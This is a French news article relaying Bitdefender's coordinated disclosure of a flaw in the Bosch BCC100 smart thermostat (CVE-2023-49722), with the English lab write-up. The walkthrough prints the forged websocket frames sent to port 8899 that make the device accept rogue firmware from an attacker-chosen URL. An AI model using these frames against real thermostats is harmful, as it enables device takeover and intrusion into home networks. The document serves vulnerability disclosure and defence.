Vulnérabilité IoT : Bitdefender alerte sur les vulnérabilités du thermostat Bosch BCC100

0
96

Bitdefender publie ce jour une étude de vulnérabilité sur le célèbre thermostat Bosch BCC100. La vulnérabilité concerne le microcontrôleur Wi-Fi qui sert de passerelle réseau pour le microcontrôleur logique du thermostat (le cerveau de l’appareil).

Tribune – Par l’intermédiaire du microcontrôleur Wi-Fi, un pirate peut envoyer des commandes au thermostat, y compris l’écriture d’une mise à jour malveillante de l’appareil, ce qui lui permet de s’introduire dans le réseau de l’utilisateur afin d’observer le trafic, de s’orienter vers d’autres appareils et de se livrer à de nouvelles activités malveillantes.

Bosch a appliqué un correctif à la vulnérabilité. Cependant, Bitdefender recommande aux utilisateurs de s’assurer qu’ils utilisent bien le logiciel afférent le plus récent.

Les points clé de l’audit (et l’analyse complète par le Lab Bitdefender en anglais ci-dessous :

  • Une vulnérabilité a été découverte sur le célèbre thermostat Bosch BCC100. Elle affecte le microcontrôleur Wi-Fi qui sert de passerelle réseau pour le contrôleur logique de l’appareil.
  • Cette vulnérabilité permet à un pirate d’envoyer des commandes au contrôleur logique, y compris une mise à jour malveillante qui permettrait au pirate de s’introduire dans le réseau de l’utilisateur ou simplement de bloquer l’appareil.
  • Les cybercriminels recherchent des appareils IoT non corrigés à l’aide d’outils de scan automatisés
  • Pour une entreprise ou même un utilisateur lambda, il convient de limiter l’accès au réseau IoT et de configurer les réseaux “interne”, “IoT” et “invité” de manière distincte. Et tous ces réseaux doivent être isolés les uns des autres. Si des dispositifs de point de vente sont utilisés, ils doivent être connectés via 4/5G ou via un réseau Wi-Fi ou câblé dédié.

Ci-dessous, l’analyse de vulnérabilité par Bitdefender :

Foreword

Several factors underscore the importance of smart thermostats: energy efficiency, environmental sustainability, and the spread of smart home technologies. These devices have a major impact on energy conservation and its associated cost savings, while making homes noticeably more comfortable.

This combination of energy efficiency, convenience and environmental consciousness, which resonate with the current priorities of individuals, governments and societies, have led to the diversification of an ecosystem comprised of multiple vendors and technologies.

As the creator of the world’s first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities that might affect customers if left unaddressed. This research article is part of a broader program and aims to shed light on the security of the world’s best-sellers in the IoT space. This report covers the Bosch BCC100 thermostat and reveals vulnerabilities affecting the SW version 1.7.0 – HD Version 4.13.22.

Vulnerability at a glance

[LOCAL] During our security audit, Bitdefender researchers discovered a vulnerability that lets an attacker on the same network replace the device firmware with a rogue version (CVE-2023-49722).

Disclosure timeline

  • Aug 29, 2023: Bitdefender makes first contact with the vulnerable vendor and submits the full report
  • Sep 18, 2023: Bitdefender learns that the issue is still undergoing internal investigation at the vendor
  • Oct 04, 2023: Vulnerability is triaged and confirmed.
  • Oct 30, 2023: Bitdefender asks for an update, and is told the issue is still being handled
  • Nov 11, 2023: Fix deployed in production.
  • Nov 17, 2023: Bitdefender asks for additional info about the update timeline in preparation for coordinated vulnerability disclosure
  • Jan 11, 2024: This report becomes public.

Vulnerability walkthrough

The thermostat has two microcontrollers that work together, as seen in the picture below. The one on the right, in yellow, is a Hi-Flying chip, HF-LPT230, that implements the Wi-Fi functionality. It acts as a network gateway for the logic microcontroller. The STMicroelectronics chip, STM32F103, in red, is the brain of the device and implements the main logic.

The STM chip has no networking capabilities and instead relies on the Wi-Fi chip to communicate with the Internet. It uses the UART protocol to pass data to the Wi-Fi chip, which acts as a gateway/proxy and establishes the actual connection to the servers.

We have discovered that the Wi-Fi chip also listens on TCP port 8899 on the LAN, and will mirror any message received on that port directly to the main microcontroller, through the UART data bus. This means that, if formatted correctly, the microcontroller can’t distinguish malicious messages from genuine ones sent by the cloud server. This allows an attacker to send commands to the thermostat, including writing a malicious update to the device.

Updating the thermostat with arbitrary firmware

The thermostat communicates with the connect.boschconnectedcontrol.com server through JSON encoded payloads over a websocket. The packets sent by the server are unmasked, making them easy to imitate.

First, we send the “device/update” command on port 8899 that lets the device know that there is a new update and to start the update procedure:

\x81\x46{“cmd”:”device/update”,”device_id”:”<device mac address>”,”timestamp”:1111111}

This will prompt the thermostat to ask the cloud server for details about the update:

{“cmd”:”server/fireware”,”device_id”:”<device mac address>”,”timestamp”:”<unix timestamp>”,”model”:”BCC101″,”version”:”1.7.0″,”id”:”0″}

Even though the server responds with an error code because there is no update available:

{“error_code”:”99″,”cmd”:”server/fireware”,”device_id”:”<device mac address>”,”timestamp”:”<unix timestamp>”}

The device will also accept a forged response containing the update details:

\x81\x7e\x01\x33{“error_code”:”0″,”cmd”:”server/fireware”,”device_id”:”<device mac>”,”timestamp”:”<unix timestamp>”,”model”:”BCC101″,”version”:”<fw version>”,”url”:”<firmware URL>”,”size”:”<firmware size>”,”isize”:”0″,”pic_pos”:”2930″,”md5″:”<firmware md5>”,”type”:0,”release_date”:”1111-11-11″}

This packet contains the URL where the firmware will be downloaded from, the size and MD5 checksum of the firmware file, and the version of the new firmware, which must be higher than the current one. There are no validation mechanisms for firmware update authenticity.

If all the conditions match, the thermostat asks the cloud server to download the firmware and send it through the websocket:

{“cmd”:”server/deviceUpdate”,”device_id”:”<device mac>”,”timestamp”:”<unix timestamp>”,”url”:”<firmware URL>”,”pindex”:”0″}

The URL must be Internet-accessible, as the cloud server is the component that downloads the file. After the device receives the file, it performs the upgrade. At this point, the device is considered totally compromised.